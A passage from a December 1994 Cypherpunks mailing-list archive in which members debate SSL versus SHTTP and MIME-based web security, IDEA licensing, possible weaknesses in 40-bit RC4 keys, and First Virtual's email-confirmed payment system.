Subject: Articles on Adelman and E=mc(2) Message-ID: <199412131550.KAA23154@pipe3.pipeline.com> The New York Times has an interesting article today on the life and career of Leonard Adelman, with remarks on RSA and public key cryptography. Friendly, not technical. For email copy send blank message with subject: LA_lite And, while not directly related to crypto, the magazine "The Sciences", published by the New York Academy of Sciences, has a long article, "Beyond E=mc(2)", on a controversial theory that mass is "only electric charge and energy". The authors are: Bernard Haisch, Alfonso Rueda and H. E. Puthoff. For copy send blank message with subject: EMC2_too Here is a brief excerpt: Recent work by us and others now appears to offer a radically different insight into the relation E=mc(2), as well as into the very idea of mass itself. To put it simply, the concept of mass may be neither fundamental nor necessary in physics. In the view we will present, Einstein's formula is even more significant than physicists have realized. It is actually a statement about how much energy is required to give the appearance of a certain amount of mass, rather than about the conversion of one fundamental thing, energy, into another fundamental thing, mass. Indeed, if that view is correct, there is no such thing as mass -- only electric charge and energy, which together create the illusion of mass. The physical universe is made up of massless electric charges immersed in a vast, energetic, all-pervasive electromagnetic field. It is the interaction of those charges and the electromagnetic field that creates the appearance of mass. In other words, the magazine you now hold in your hands is massless; properly understood, it is physically nothing more than a collection of electric charges embedded in a universal energetic electromagnetic field and acted on by the field in such a way as to make you think the magazine has the property of mass. Its apparent weight and solidity arise from the interactions of charges and field. Besides recasting the prevailing view of mass, this idea would address one of the most profound problems of physics, the riddle of how gravity can be unified with the other three fundamental forces of nature. The electromagnetic force and the weak force, which is responsible for nuclear decay, have been shown to be two manifestations of a single force, appropriately called the electroweak force. There are tantalizing hints that the strong force, which binds nuclei together, will someday be unified with the electroweak force. But until now gravity has resisted all attempts at unification. If the new view is correct, however, gravity would not need to be separately unified. Just as mass would arise from the electromagnetic force, so would gravity. End excerpt. From perry at imsi.com Tue Dec 13 07:55:14 1994 From: perry at imsi.com (Perry E. Metzger) Date: Tue, 13 Dec 94 07:55:14 PST Subject: the netscape/ssl controversy In-Reply-To: <199412131448.JAA07613@cutter.clas.ufl.edu> Message-ID: <9412131554.AA12240@snark.imsi.com> Avi Harris Baumstein says: > so what is a better solution? > > i would choose a mime multipart using pgp or some other cryptographic > method. There is now a "Security Multiparts" document that tells you just how to do this. Check the internet drafts directory... Perry From perry at imsi.com Tue Dec 13 08:06:31 1994 From: perry at imsi.com (Perry E. Metzger) Date: Tue, 13 Dec 94 08:06:31 PST Subject: Articles on Adelman and E=mc(2) In-Reply-To: <199412131550.KAA23154@pipe3.pipeline.com> Message-ID: <9412131605.AA12267@snark.imsi.com> John Young says: > The New York Times has an interesting article today on the life > and career of Leonard Adelman, with remarks on RSA and public > key cryptography. Friendly, not technical. The article contains a serious inaccuracy -- it credits Adleman with having invented the term "Computer Virus", when, in fact, it was probably John Brunner in his novel "The Shockwave Rider" over ten years earlier. It also inaccurately credits one of his students with developing the first one as a test, when in fact they existed for a long time before. .pm From amanda at intercon.com Tue Dec 13 08:23:57 1994 From: amanda at intercon.com (Amanda Walker) Date: Tue, 13 Dec 94 08:23:57 PST Subject: Clarification of my remarks about Netscape Message-ID: <9412131124.AA32568@amanda.dial.intercon.com> > Amanda, we're not trying to push anything into the standards track. > We're publishing SSL as an informational RFC, and we have > separately submitted SSL as a proposal to the W3O working group > on security (in parallel with SHTTP and a handful of other > proposals). Nothing is being pushed into the standards track. Aha. This was not particularly clear from my reading of the SSL spec and the other stuff about SSL on your WWW server. If you're just issuing an informational RFC, then I have just become much less annoyed. Amanda Walker InterCon Systems Corp. From sommerfeld at orchard.medford.ma.us Tue Dec 13 08:28:24 1994 From: sommerfeld at orchard.medford.ma.us (Bill Sommerfeld) Date: Tue, 13 Dec 94 08:28:24 PST Subject: HTTP security In-Reply-To: <9412131046.AA05938@amanda.dial.intercon.com> Message-ID: <199412131615.LAA00818@orchard.medford.ma.us> -----BEGIN PGP SIGNED MESSAGE----- > > This seems a very relevant criticism: Has Amanda, or anyone else > > proposed an extension to HTML that would incorporate such things? > > Actually, it's not an extension to HTML, but to MIME (whose formats > HTTP uses top tag and label data), and it just went to Proposed > Standard Not just yet; they're currently arguing about this on the pem-dev list... > (the last step before Internet Standard). Nope, the IETF stds track is Proposed Standard -> Draft Standard -> Standard > EInet's secure SHTTP proposal is also an end-to-end security framework. Right, but with its preoccupation with negotiation, it seems to be more oriented towards securing the *transaction* rather than the *document*. There are at least three different layers at which HTTP and "the web" can be secured: 1) - the *transport* (and lower) -- secured by IPSP and/or SSL 2) - the *transaction* (e.g, authentication for access control) 3) - the *document* (e.g., authentication by the document's author) The difference between (1) and (2) becomes obvious when proxies are involved. Doing (2) complicates distributed caching, while (1) and (3) don't really get in the way of caches. Frankly, I think that the web needs (3), then (1), and only later (2). - Bill -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLu3IfrT+rHlVUGpxAQH8PQP/S1L6M56E0RZxMymL13YeIT4wdDdcgE39 NvYz1IanrDRkStIgDCeNrDPIL0fOhuyx04RqC+BUHKu5qTjcWu8oJTcRIe3W64kw sRFa/BmEJh/T/RwdIXTQdxsbTbs6aa6JS2DIVuIpGzofIkOB5namiU9juYu5QSiO SFxS/Rbyc3o= =BKdJ -----END PGP SIGNATURE----- From perry at imsi.com Tue Dec 13 08:29:43 1994 From: perry at imsi.com (Perry E. Metzger) Date: Tue, 13 Dec 94 08:29:43 PST Subject: Clarification of my remarks about Netscape In-Reply-To: <9412131124.AA32568@amanda.dial.intercon.com> Message-ID: <9412131629.AA12352@snark.imsi.com> "Amanda Walker" says: > > Amanda, we're not trying to push anything into the standards track. > > We're publishing SSL as an informational RFC, and we have > > separately submitted SSL as a proposal to the W3O working group > > on security (in parallel with SHTTP and a handful of other > > proposals). Nothing is being pushed into the standards track. > > Aha. This was not particularly clear from my reading of the SSL > spec and the other stuff about SSL on your WWW server. If you're > just issuing an informational RFC, then I have just become much less > annoyed. You, perhaps, but not me. They are publishing it as an informational RFC to get an end run around the IETF process in my opinion -- they fully intend for people to use the protocol on a non-experimental basis, so it isn't just "information". I may try to have a talk with the IESG and Postel before this publication happens. Perry From ekr at eit.COM Tue Dec 13 08:34:10 1994 From: ekr at eit.COM (Eric Rescorla) Date: Tue, 13 Dec 94 08:34:10 PST Subject: HTTP security Message-ID: <9412131633.AA24750@eitech.eit.com> See what happens when you call my name (or at least try to...) James is > Amanda is >> >> This seems a very relevant criticism: Has Amanda, or anyone else >> proposed an extension to HTML that would incorporate such things? >Actually, it's not an extension to HTML, but to MIME (whose formats HTTP uses >top tag and label data), and it just went to Proposed Standard (the last step >before Internet Standard). The MIME multipart/signed and multipart/encrypted >body parts allow anything using MIME encapsulation to sign and/or encrypt >arbitrary body parts. Since it's at the document layer, it requires no >special transport software, works with existing proxies and caching servers, >and allows secure HTTP software to share code with secure email software >(since it would use exactly the same formats). The framework is general >enough to allow use with either PEM-compliant signatures and encryption or >others (such as PGP). I believe that can also be used with symmetric key >management, which could be useful for special purpose applications. Uh, PEM-MIME no longer supports symmetric key management. >EInet's secure SHTTP proposal is also an end-to-end security framework. Actually, it's EIT. EInet is an MCC (the people who did MacWeb, not to be confused with MCOM, the people who did Netscape. Confusing, ain't it?) project. Anyway, the approach that Amanda describes is pretty much the one that SHTTP takes. We use already established encapsulation formats to do data encapsulation. SHTTP can be used to enhance either entire protocol messages or objects or both. (You can do both in the same message using a recursive encapsulation). I think Amanda has done an adequate job of talking about end to end security, so I won't talk about that. I would like to briefly motivate why just using PEM-MIME isn't enough, though. (We considered it and believe me it would have been a lot easier on our brains and fingers...) PEM-MIME and to a lesser extent PGP are basically cryptographic messaging formats intended for email type applications. However, the email model is fundamentally different from the Web model in a number of ways. Let me just give one example: In the email world, you don't necessarily have any sort of prior relationship with the person you're communicating with and that public key cryptography is relatively cheap. (When it takes minutes to ship mail across the net, who's going to notice a second or two of signature verification?) However, in the case of the Web, things are very different. When a server replies to one of my requests, we have definitely exchanged at least one message. Now, assume for the moment that my request was encrypted and that I desire confidentiality for the reply. There is no need for the server to perform public key crypto because we've had the opportunity to exchange a key already. This means a substantial performance improvement. [It incidentally means that a server and I can communicate privately even if I don't have a key pair]. When I say that just PEM-MIME is inadequate, I don't mean to imply that using it is inadequate, however. On the contrary, we use PEM and PKCS7 already and are gearing up to include PEM-MIME, now that it's going to proposed standard. [Incidentally, there's no reason you couldn't use PGP too, although I propose that it's most useful in the proposed PGP-MIME multiparts...] And you should be able to reuse your PEM-MIME engines to write SHTTP handlers. It's just that we also took on some issues that we thought were important that we couldn't steal solutions for.. -Ekr From A5713643665 at attpls.net Tue Dec 13 08:39:06 1994 From: A5713643665 at attpls.net (Tom Jones) Date: Tue, 13 Dec 94 08:39:06 PST Subject: IDEA freeware Message-ID: <8AF920A1> Dear Kipp, Please explain where this "freeware" IDEA code comes from. IDEA is a patented algorithm that cannot be used without a license. PGP comes with a license. I know of no other code in the US that has such a license. Tom From ekr at eit.COM Tue Dec 13 08:39:44 1994 From: ekr at eit.COM (Eric Rescorla) Date: Tue, 13 Dec 94 08:39:44 PST Subject: Correction Message-ID: <9412131637.AA24834@eitech.eit.com> My previous message about HTTP Security implied that you would (in SHTTP) reuse the DEK from say an HTTP request for the reply. You most certainly would not do this. (It's horribly bad key hygiene.) Rather, SHTTP provides a way to exchange a symmetric encryption key (in an HTTP message) that can subsequently be used cover subsequent DEKs. Sorry for the possible confusion... -Ekr From perry at imsi.com Tue Dec 13 08:44:25 1994 From: perry at imsi.com (Perry E. Metzger) Date: Tue, 13 Dec 94 08:44:25 PST Subject: HTTP security In-Reply-To: <9412131633.AA24750@eitech.eit.com> Message-ID: <9412131643.AA12378@snark.imsi.com> Eric Rescorla says: > In the email world, you don't necessarily have any sort of prior > relationship with the person you're communicating with and that public > key cryptography is relatively cheap. (When it takes minutes to > ship mail across the net, who's going to notice a second or two > of signature verification?) However, in the case of the Web, > things are very different. Since one can sign pages just once (they are written once and read often) and one can pick one's signature algorithm to speed up verifications relative to the signatures (using small exponents is the usual trick fo this), I'm not sure its that big a problem. I'd like these algorithms to support the serving of signed pages from hosts that do not know the keys that the pages have been signed with -- offline signature schemes like the one I just described will support that nicely. (However, any algorithm that is cognisant of the difference between securing the pages and just securing the channel is an improvement over the SSL proposal.) .pm From amanda at intercon.com Tue Dec 13 09:06:00 1994 From: amanda at intercon.com (Amanda Walker) Date: Tue, 13 Dec 94 09:06:00 PST Subject: HTTP security Message-ID: <9412131206.AA35070@amanda.dial.intercon.com> > Actually, it's EIT. EInet is an MCC (the people who did MacWeb, not to > be confused with MCOM, the people who did Netscape. Confusing, ain't > it?) project. I think I'm starting to need a quick reference card :). > When a server replies to one of my requests, > we have definitely exchanged at least one message. > Now, assume for the moment that my request was encrypted and that I > desire confidentiality for the reply. There is no need for the server > to perform public key crypto because we've had the opportunity to > exchange a key already. This means a substantial performance > improvement. [It incidentally means that a server and I can > communicate privately even if I don't have a key pair]. This is true. Just as an exercise, I'll give a description of the informal model that I have been using as I evaluate different proposals for secure HTTP (and other Internet security proposals). (1) I trust the network somewhat more than I trust the server machine. This is why I don't like SSL, for example. Now, I realize that this assumption is not a universal (someone in a college dorm would trust the server a lot more than the network), but the fact is that once you get off your organizational Ethernet, it's hard to monitor the Internet. On the other hand, servers are a problem. If someone's running a web page on Netcom, for example, I don't want to have to worry about whether or not they've been broken into this week (note that I'm using Netcom strictly as an example--the same concern holds for any public access system). I want to be able to authenticate the content I am viewing without having to worry about whether or not the transport & server systems have been compromised. I'm still vulnerable to a denial of service attack, of course, but at least I can tell when I do get something that it is genuine. This concern holds even when I don't care if the content is encrypted. If I get sales literature, I want it signed by the organization it claims to be from, and so on. And for this purpose, I like X.509. Self-signed certificates are fine, if there are other ways to verify the public key. Signed PGP keys could be used as certificates as well, of course. (2) I want authenticated content all the time, even if it's just to an anonymous key pair I've gotten through some other channel. (3) I want private content sometimes. When I want private content, I want end-to-end privacy, not just transport level privacy. (4) Occasionally, I want transaction security (sending a credit card order, for example), where I want the transaction to be encrypted, signed, and not subject to playback attacks. Ideally, the server itself won't be able to decrypt it--only the actual recipient will. In all cases, I expect the network and the server machines and software to be insecure. Anything else is simply unrealistic. Amanda Walker From jgrubs at voxbox.norden1.com Tue Dec 13 09:07:52 1994 From: jgrubs at voxbox.norden1.com (Jim Grubs, W8GRT) Date: Tue, 13 Dec 94 09:07:52 PST Subject: BofA+Netscape Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Rick Busdiecker writes: > Even Apple & Microsoft agree that Netscape is brain dead... Is that the same Microsoft that brought us Edlin??? -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLu3Lud74r4kaz3mVAQEWvwQAp/fQ5DmE28saQziqd+AJU9RIaqc9lQ8k /oDfOGLmA9RFL1R1hHbTBmQqd+rdjZgtW+o1J9WTMZ3ttoR03G8Nhr7gtrZncMTD /OmL7BmKGQTjp24MsIXk+oBdpyN/X1VqNrGZvuK9/GIDpkEA5d7Q8qlAHLYDRkv8 KcGJBMRRBFU= =0gC5 -----END PGP SIGNATURE----- ... "The greatest dangers to liberty lurk in the insidious encroachment of men of zeal, well meaning but without understanding." - Justice Louis Brandeis -- jgrubs at voxbox.norden1.com (James C. Grubs, W8GRT) Voxbox Enterprises, 6817 Maplewood Ave., Sylvania, Ohio 43560-1956 Tel.: 419/882-2697 From jgrubs at voxbox.norden1.com Tue Dec 13 09:07:57 1994 From: jgrubs at voxbox.norden1.com (Jim Grubs, W8GRT) Date: Tue, 13 Dec 94 09:07:57 PST Subject: Hal Finney & Bob Rae and Ontario's Parliament Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Richard Martin ( frodo ) writes: > Mea culpa. I was thrown by the US government's free use of it (I think > they get that, don't they?). On a silly note, my government is not > currently making money, and could hardly be classified as being in > business. ;) At least yours isn't planning a going out of business sale.... -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLu3PWd74r4kaz3mVAQHJ5AP/WbDZL2bM1Dn8GuNcOSRkM9PTR75oGOwb fg2dwp95pojg9DWsmRuhiydX4l+Jb0tXdCNn/J/Xou5/ABBQ7vngyVbK90Inv6Sq Dahptd8jXKyHQvz0xex3Jmd81+KXhM4DIR7f8dMEs3NDVzwgORnUlCvJQg116dJO j+kTyHCzGd0= =vPKv -----END PGP SIGNATURE----- ... "The greatest dangers to liberty lurk in the insidious encroachment of men of zeal, well meaning but without understanding." - Justice Louis Brandeis -- jgrubs at voxbox.norden1.com (James C. Grubs, W8GRT) Voxbox Enterprises, 6817 Maplewood Ave., Sylvania, Ohio 43560-1956 Tel.: 419/882-2697 From ekr at eit.COM Tue Dec 13 09:09:06 1994 From: ekr at eit.COM (Eric Rescorla) Date: Tue, 13 Dec 94 09:09:06 PST Subject: HTTP security Message-ID: <9412131708.AA25651@eitech.eit.com> I sent a slightly less polished version of this to Perry, and then realized he'd cc'ed Cypherpunks.. but it was gone by then... Perry Metzger sez: >Eric Rescorla says: >> In the email world, you don't necessarily have any sort of prior >> relationship with the person you're communicating with and that public >> key cryptography is relatively cheap. (When it takes minutes to >> ship mail across the net, who's going to notice a second or two >> of signature verification?) However, in the case of the Web, >> things are very different. >Since one can sign pages just once (they are written once and read >often) and one can pick one's signature algorithm to speed up >verifications relative to the signatures (using small exponents is the >usual trick fo this), I'm not sure its that big a problem. You are of course correct. I should have chosen the example of encryption, where you can't preenhance. >I'd like these algorithms to support the serving of signed pages from >hosts that do not know the keys that the pages have been signed with >-- offline signature schemes like the one I just described will >support that nicely. Yes. Conveniently, we've anticipated this requirement. The content type of an SHTTP message can be set to indicate that the enhanced content is actually an enhanced document rather than an enhanced HTTP request/reply. So, you just cons up some headers and drop in the presigned page... But this is a very good point. I'm glad I'm not the only person who thinks this is an important requirement. Details on this can be found in the current SHTTP spec (Section 2.3.3) -Ekr From hfinney at shell.portal.com Tue Dec 13 09:44:50 1994 From: hfinney at shell.portal.com (Hal) Date: Tue, 13 Dec 94 09:44:50 PST Subject: Authentication vs encryption: CPs on the web Message-ID: <199412131744.JAA04700@jobe.shell.portal.com> -----BEGIN PGP SIGNED MESSAGE----- I notice in these discussions of security on the web that the topic blurs back and forth between authentication and encryption. Particularly when discussing using MIME with security extensions to "secure" a document by pre-signing it, this form of security does not add privacy. It does provide a useful service by allowing you to verify authorship, but my interests are in using cryptography to protect privacy. I think it is useful to keep a clearer distinction between these. I notice that the people who come to this topic from an institutional point of view tend to be more interested in the authentication aspects. This seems to fit better into the control-oriented mindset. With authentication you can track what people are doing better; non-repudiable signatures could actually work in some ways against the signer. I think that may be one reason Phil Zimmermann is famous for not signing his messages. :-) But encryption can actually work against institutional interests (compared to individual ones) by making it harder to keep track of people's activities. I exchanged email on this with Vint Cerf during the PEM standardization process. I objected to the fact that with PEM you could not encrypt a message unless you signed it. Now of course you can always fake the signature if you need to but the principle seemed skewed to me. Cerf honestly could not understand why you would ever want to do this. What security could there be if the message were not signed, he wondered. To me the issues are separate. Encryption is used to make sure the message is seen by only those for whom it is intended, and signatures are used to verify the source of the message. The choice of which of these two transformations to apply should be up to the users. I don't speak for other cypherpunks, but my interests with regard to web security extensions would lie in the following areas. I want to be able to use the web and maintain my privacy. I don't want snoopers on the net or on my local machine to know which web sites I visit or what material I download. (This ties into the electronic cash issue - what use is "anonymous" cash if everyone can see where I'm spending it and what I'm buying?) I also want to be able to hide my identity from the web servers themselves, at least if this is mutually agreeable. If a server wants to accept only authenticated connections where it knows who the users are that it is serving, fine. But I want the options to be there. I want to be able to make payments to access and download information while protecting my privacy. I don't want to be put onto mailing lists or get my name into databases of people who like X without my permission. This implies a range of payment mechanisms including credit cards, digital checks, and digital cash. And it also requires the privacy and anonymity features above. I want these features to be a matter of mutual negotiation between client and server. The protocols should not build in veto power for either side over how much privacy the transaction includes (although either side may choose not to participate if mutually agreeable terms can't be worked out). And therefore these features should not be restricted to just a small fraction of transactions, where we drop into "secure mode" momentarily so I can send my credit card number. I want to be in secure mode all the time. This is IMO the standard cypherpunks wish list as applied to the WWW. But it does not seem to match up with either the commercial or institutional interests which are driving the standards process. I hope those CP's who are involved in these efforts can work to spotlight the need for individual privacy. We should give as much power, choice, and control as possible to the individual end-users of the web. Otherwise privacy is going to be very difficult to maintain in this world of electronic commerce. Hal Finney hfinney at shell.portal.com -----BEGIN PGP SIGNATURE----- Version: 2.6 iQBVAwUBLu3dHRnMLJtOy9MBAQGZlwH+PYN4FahcHflm4XFPkaJE3h/QLY3lMZV5 BY4U7w7OwpVSTEUqDKd7SvjIg4tt14QI/DGGj0jyHbIS9lWew8U3rQ== =QbAD -----END PGP SIGNATURE----- From eric at remailer.net Tue Dec 13 09:45:10 1994 From: eric at remailer.net (Eric Hughes) Date: Tue, 13 Dec 94 09:45:10 PST Subject: What, exactly is elliptic encryption? In-Reply-To: <9412131447.AA12121@snark.imsi.com> Message-ID: <199412131842.KAA02350@largo.remailer.net> From: "Perry E. Metzger" Basically, there are ways of extending public key methods into fields other than the integers modulo some prime Small correction. While integer modulo a prime are fields (i.e. they have division), elliptic curve solutions only have a group structure, which is usually written as addition. Eric From raph at netcom.com Tue Dec 13 09:49:01 1994 From: raph at netcom.com (Raph Levien) Date: Tue, 13 Dec 94 09:49:01 PST Subject: More 40-bit RC4 nonsense Message-ID: <199412131742.JAA27330@netcom5.netcom.com> -----BEGIN PGP SIGNED MESSAGE----- If I recall correctly, the first byte out of the RC4 stream has about a 40% chance of being the first byte of the key. Thus, if the 40-bit "secret" part of the key is the _beginning_ of the full 128-bit key, then the keyspace is effectively reduced by about seven bits, meaning that I would be able to crack a key on my PC in a couple of days or so. Of course, if the "clear" 88 bits went first, there would be no advantage whatsoever. The SSL document very carefully does not say how they combine the two key parts to form the 128-bit key. Does anyone know? Raph -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAwUBLu3cI/4BfQiT0bDNAQEToQQAtcy2v0sBd+g5GBrm+Pa1AykqS4tTctfu EYga7kPry4wvGmI7/HpD+SVVDQRcJe+O9CxH9cpvRgBRIBhyvsFXVBSTW0OTJgXb 1bYh5qerD5J/gXAs0XWIp0+Hj8GqeTIRkFTseU4MDcDfQ7tOSEFvul97iSNYIytX AMkmAEmMXxU= =S80T -----END PGP SIGNATURE----- From kipp at warp.mcom.com Tue Dec 13 09:51:08 1994 From: kipp at warp.mcom.com (Kipp E.B. Hickman) Date: Tue, 13 Dec 94 09:51:08 PST Subject: IDEA freeware In-Reply-To: <8AF920A1> Message-ID: <9412130948.ZM18452@warp.mcom.com> On Dec 13, 3:45pm, Tom Jones wrote: > Subject: IDEA freeware > Dear Kipp, > > Please explain where this "freeware" IDEA code comes from. IDEA is a > patented algorithm that cannot be used without a license. PGP comes > with a license. I know of no other code in the US that has such a > license. If you are using it for non-comercial use, it's free. Us commercial gooneys get stuck paying for everything :-| In any case, here is a useful link: http://www.openmarket.com/info/cryptography/applied_cryptography.html It lists all of the goodies available from bruce schneir's book. Note that most of the data comes from italy...including DES. ha! -- --------------------------------------------------------------------- Kipp E.B. Hickman Netscape Communications Corp. kipp at mcom.com http://www.mcom.com/people/kipp/index.html From kipp at warp.mcom.com Tue Dec 13 10:02:38 1994 From: kipp at warp.mcom.com (Kipp E.B. Hickman) Date: Tue, 13 Dec 94 10:02:38 PST Subject: Clarification of my remarks about Netscape Message-ID: <9412131800.AA18475@warp.mcom.com> In article <199412130729.XAA01473 at jobe.shell.portal.com>, you write: > -----BEGIN PGP SIGNED MESSAGE----- > > It is nice to have a lot of people on the list from Netscape. > Here is a question about SSL relating to the use of certificates: > > + The issuer name must resolve to a name that is deemed > acceptable by the application using SSL. How the application > using SSL does this is outside the scope of this memo. > > What does Netscape actually do about this? If I want to make a server > which will interoperate with existing Netscape clients what kind of > certificate do I need, and what kind of name should be in there? > Thanks - > > Hal Finney > hfinney at shell.portal.com > > -----BEGIN PGP SIGNATURE----- > Version: 2.6 > > iQBVAwUBLu1NOxnMLJtOy9MBAQGItwIAr4eerI+FSmPpOIcwITepnXzcUUFkPwsK > +Rz2FC4Y6hV0HoDEt1JnpvCPVV5N74Jtc9xMmF8CcRlBybk25PkxVQ== > =LOql > -----END PGP SIGNATURE----- Because online directory services are not one of the extant solved problems on the Internet, Netscape uses a simple approach - a small set of "important issuer" certificates are compiled into the browser. A future release will support "key rings" ala PGP. This is all we had time for in this release... All you need to do is get your server certificate from one of several places, including: RSA (commercial CA or server CA) Netscape (not likely; we can't afford the liability) MCI (I don't know if they are selling this). So the short answer is: it's hard to do right now. In six months it should be a very different scenario. --------------------------------------------------------------------- Kipp E.B. Hickman Netscape Communications Corp. kipp at mcom.com http://www.mcom.com/people/kipp/index.html From anonymous-remailer at shell.portal.com Tue Dec 13 10:15:06 1994 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Tue, 13 Dec 94 10:15:06 PST Subject: BofA + Netscape Message-ID: <199412131814.KAA07205@jobe.shell.portal.com> > It seems that Perry and other are flaming Netscape for doing things > their own way. > Yes, Netscape have made a lot fuckups. But they are out there > bringing really cool crypto to the masses. > First guy on the block always does a lot of dumb fuckups. This is by far the most intelligent commentary I've read so far in this "NetScape" debate. Does anybody remember PGP 1.0? Released in the summer of 1991, using the Bass-O-Matic cipher... which was worthless. This list didn't come into existence until around the same time PGP 2.0 came out. Thus, nobody railed against the weaknesses of PGP like they are railing against NetScape. So maybe the first version of NetScape could use some enhancements. Just like PGP 1.0 did. Nobody would argue that based on the direction of PGP 1.0, the whole PGP project should be scrapped. Or would they? I think NetScape is doing overall good. Sure, improvements can be made. But SOMETHING is being accomplished. From kipp at warp.mcom.com Tue Dec 13 10:18:06 1994 From: kipp at warp.mcom.com (Kipp E.B. Hickman) Date: Tue, 13 Dec 94 10:18:06 PST Subject: IPSP and Netscape Message-ID: <9412131807.AA18482@warp.mcom.com> In article <199412130302.TAA00871 at largo.remailer.net>, you write: > I've tried really hard to stay out of this, but this one is just too much. > > The question is about IPSP, the swIPe-like IP level security protocol. > > From: "Kipp E.B. Hickman" > > Name one router that speaks the secure protocols you are > documenting? Name one PPP based bridge that does? Show me, today, > what percentage of the Internet is covered by these standards? > > [ ... later ... ] > > My company's network hardware is typical. It is filled with > expensive devices that don't understand IPSP or IPNG. In fact, most > of the world is constructed this way. > > The protocol does IP-within-IP encapsulation, which means that every > single router deployed is able to carry the secured traffic. > > Now, this is not so egregious an error by itself (it is, but I'm being > polite), but coupled with the claims that SSL is better than anything > else out there, I see an argument from chauvinism rather than one from > knowledge. > > Since IPSP works at the IP level rather than at the TCP level there > are protocol stacks that have to change. This is not immediate. It > may be that IPSP is not the quickest or best way to link security, but > that is not the point I am making here. The original denial of IPSP's > potential utility was made in complete ignorance, ignorance so great > to lack even the most basic understanding of the subject at hand. > > I cannot trust abbreviated arguments from such a source. I can, > however, examine ones which are complete and well thought out and > demonstrate some understanding of tradeoffs. I'm sorry you are so upset. :-( IPSP was not in my vocabulary at the time of the first posting. Ignorance was briefly bliss :^) However, regardless of whether or not extant hardware is reusable, there is still the not so small matter of software. Software for PC's, MAC's and a host of UNIX machines before a workable secure network can be constructed. It is a good thing that IPSP requires only software to meet it's goals. This same property is true of SSL. Finally, I never said that "SSL is better than anything out there". I don't know who did. All I said is that "SSL is something", which isn't really saying much. SSL is A solution to A set of problems, namely privacy and authentication. --------------------------------------------------------------------- Kipp E.B. Hickman Netscape Communications Corp. kipp at mcom.com http://www.mcom.com/people/kipp/index.html From nsb at nsb.fv.com Tue Dec 13 10:32:15 1994 From: nsb at nsb.fv.com (Nathaniel Borenstein) Date: Tue, 13 Dec 94 10:32:15 PST Subject: Brands excluded from digicash beta In-Reply-To: <9412021548.AA17294@tadpole> Message-ID: I'm sorry that it took me so long to reply to this thread. I've been travelling and came back to a backlog of over 3000 messages. (The 100 messages/day reported by the Digicash folks sounds really *pleasant* to me right now -- I'm averaging around 350! :-) ) Excerpts from fv: 2-Dec-94 Re: Brands excluded from di.. db at Tadpole.COM (2508*) > 2) A group of us went over the First Virtual stuff in detail > last night over fajitas, and were practically rolling on the floor with laughter. I'm delighted to hear that you're so easily amused. I hope your merriment wasn't too disruptive to the other diners, who might have drawn the mistaken conclusion that you were either rude, foolish, or both. > Basically they have an attitude > of "Crypto is too hard, people won't want to use it." So > instead, each transaction consists of an e-mail exchange > which is converted ultimately into credit card transactions Wrong. A First Virtual transaction takes place as a single step via mail, FTP, or WWW. *After* the transaction there is an email exchange to confirm the purchase, and although this exchange works as-is with virtually any mail reader in the world, it can be largely automated by an FV-enhanced mail reader. Ultimately, using such a tool you'll be able click on a single button to confirm ALL of your recent transactions, assuming they're all ones you want to authorize. > The exposure time for the merchant is on the order of _90 > days_. All fraud, etc., is on the head of the merchant. You're right about the 90 days for now; as I have stated many times, this is an inevitable consequence of our extending the credit card merchant system to unknown and untrusted sellers anywhere on the Internet. You can become an FV seller with no credit checks, and indeed with no human intervention, so the 90 days protects us (and by extension the community of legitimate buyers and sellers) against abusive sellers. As I have also stated, however, we are working on a system whereby legitimate sellers can go through a qualification process after which the 90 day holding period will be completely waived. We cannot yet announce a definite availability date for this facility, but it isn't very far away. > The bottom line here is that FV has a system which is > much more sluggish than the DigiCash system, even though > it doesn't use "hard" crypto. Well, it doesn't use "any" crypto, hard or soft. As to "sluggish" -- I would point out that you can set yourself up with an account in minutes, without human intervention, which contrasts pretty well with some of the experiences reported on this list with other systems. And purchases are instantaneous. What's sluggish? Have you actually tried using our system? It is far from anonymous, This depends on your definition of anonymity. In our system, a buyer and a seller can meet and conduct business without EVER knowing each other's identities unless they choose to reveal them. This is trivial, and indeed it already happens all the time on our Infohaus. However, First Virtual knows the real identities (or, at least, we know the real underlying credit card, from which the real identity can be ultimately traced), and can be forced to provide it to the government under court order. We will otherwise keep all such information completely private. I think this meets most practical standards for anonymity, and it is certainly far more anonymous than most real-world commerce mechanisms such as credit cards, where they buyer & seller names both appear on the charge slip. > and the transactions are trivially reversible. This is actually > a _design goal_ in their "Soylent Green", er, "Simple Green" proposed standard. I'm not sure what you're referring to here, but if you mean that it's possible to refund someone's money, that's certainly true. All our accounts are in principle bidirectional, although people can choose to have buyer-only or seller-only accounts. Just out of curiousity, if I think of a silly name to call someone else's commerce mechanism, will that prove anything of interest? > It is completely inappropriate for hard > goods of significant value, As we have made clear, this was an explicit design decision. Our terms and conditions, which you don't seem to have read, actually FORBID the use of our commerce engine for hard goods. So you really don't need to work too hard to convince us on this point. > and its minimum transaction cost > is high enough to rule out its applicability for very small > transactions. Wrong again. We explicitly permit seller-based accumulation, so there's nothing to stop you from building a service that charges, say, a tenth of a penny for each bit of information; however, you have to accumulate the charges on your end until they pass our 30 cent threshhold, that's all. If someone buys less than 30 cents worth of stuff from you, you have to take it as a "free sample" loss. > Even if used for purely informational goods, > if an undercapitalized info service becomes popular, it will > sink beneath the waves while waiting for payment. This is amazingly wrong. First of all, consider what it means for an info service to become popular: It means that their server and net connection are more highly utilized. Neither of these is typically a metered resource, which means the incremental costs are zero. There's an incremental cost involved in upgrading either of them, but if your service is so wildly successful that you have this problem, how hard do you think it will be for you to get a bank loan to cover an upgrade to your computing facilities or Internet connection, which are the ONLY incremental costs of this kind of runaway success? It is also worth noting that in the existing credit card system, new merchants who have only recently qualified for Visa/MC merchant status often have a similar holding period imposed upon them by their banks. It's Standard Operating Procedure, that's all. If you're setting up an information service based on our mechanism, the cost of operation for the first 90 days should be factored into your startup expenses, just the way you would have to factor in the cost of inventory for a hard-goods business. (Indeed, for most hard goods businesses, the inventory cost would be higher than 90 days operating expenses.) > As near as I can tell, FV's technology was developed by people > who wanted to implement their pet philosophy about Internet > commerce (customer should examine info first, then commit to > paying, all transactions reversible, cryptography and anonymity > are bad, secure transactions are not possible on the net, etc.), > rather than anything bordering on an Internet cash-like system. Wrong again. FV's technology was developed by people who wanted to sell information products on the Internet. That's the ONLY reason we did it. We didn't (and still don't) see any 